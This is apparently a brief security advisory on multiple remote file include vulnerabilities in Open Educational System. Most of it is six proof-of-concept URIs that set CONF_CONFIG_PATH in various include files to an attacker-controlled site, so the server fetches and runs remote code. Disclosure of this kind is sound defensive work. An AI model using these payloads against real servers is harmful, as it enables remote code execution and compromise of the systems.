|
|
Open Educational System Multiple Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://example.com/[OES_path]/includes/lib-account.inc.php?CONF_CONFIG_PATH=attacker site http://example.com/[OES_path]/includes/lib-group.inc.php?CONF_CONFIG_PATH=attacker site http://example.com/[OES_path]/includes/lib-log.inc.php?CONF_CONFIG_PATH=attacker site http://example.com/[OES_path]/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=attacker site http://example.com/[OES_path]/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=attacker site http://example.com/[OES_path]/includes/lib-themes.inc.php?CONF_CONFIG_PATH=attacker site |
|
Privacy Statement |